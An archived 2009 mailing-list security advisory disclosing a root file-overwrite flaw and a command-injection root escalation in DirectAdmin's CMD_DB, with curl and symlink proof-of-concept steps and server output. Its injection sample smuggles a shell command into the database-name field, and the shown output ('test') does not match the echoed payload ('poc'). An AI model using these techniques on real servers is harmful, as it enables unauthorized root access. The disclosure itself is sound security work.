lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <adf14d290904220334l2b78cc4fwcac8ac7692cd51e9@mail.gmail.com>
Date: Wed, 22 Apr 2009 12:34:45 +0200
From: anony mous <137215c1224fde443096afa70f319f@...il.com>
To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
Subject: DirectAdmin < 1.33.4 Local file overwrite & Local
	root escalation

Subject: DirectAdmin < 1.33.4 Local file overwrite & Local root escalation

Author: Anonymous
ReleaseID: d8253f15e447935c24ab38a215735931942a77717d7b55d84200d070d1e54d3b
Date: 22-04-2009

The issue on http://www.directadmin.com/features.php?id=968 is larger than
the wording would indicate.

It fixes two issues in /CMD_DB.

--- Local file overwrite ---

action=backup runs a mysqldump as root and generates a predictable temporary
file in the temporary directory defined as tmpdir in
/usr/local/directadmin/conf: "$tmpdir/${dbname}.gz".
It does not check if the file exists before piping the output of "mysqldump
| gzip" into it, allowing any DA user to create or overwrite any file on the
server as root.

PoC:

On server: $ ln -s /etc/poc /home/tmp/database_name.gz
On client: $ curl http://directadminserver:2222/CMD_DB/database_name.gz
On server:
$ ls -la /etc/poc
-rw-r--r--  1 root root 514 Apr 22 09:05 /etc/poc
$ zcat /etc/poc | head -1
-- MySQL dump 10.9

--- Local root escalation ---

action=restore runs a "gunzip | mysql $dbname" as root, with $dbname being
unchecked, allowing any DA user to run any code as root.

PoC:

On client: curl -n -F action=restore -F domain=poc.com -F
'file1=@...abase.gz' -F method=default -F 'name=poc_db;echo poc > /etc/poc'
http://directadminserver:2222/CMD_DB
On server:
$ ls -la /etc/poc
-rw-r--r--  1 root root 5 Apr 22 10:30 /etc/poc
$ cat /etc/poc
test

-- 
Anonymous

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ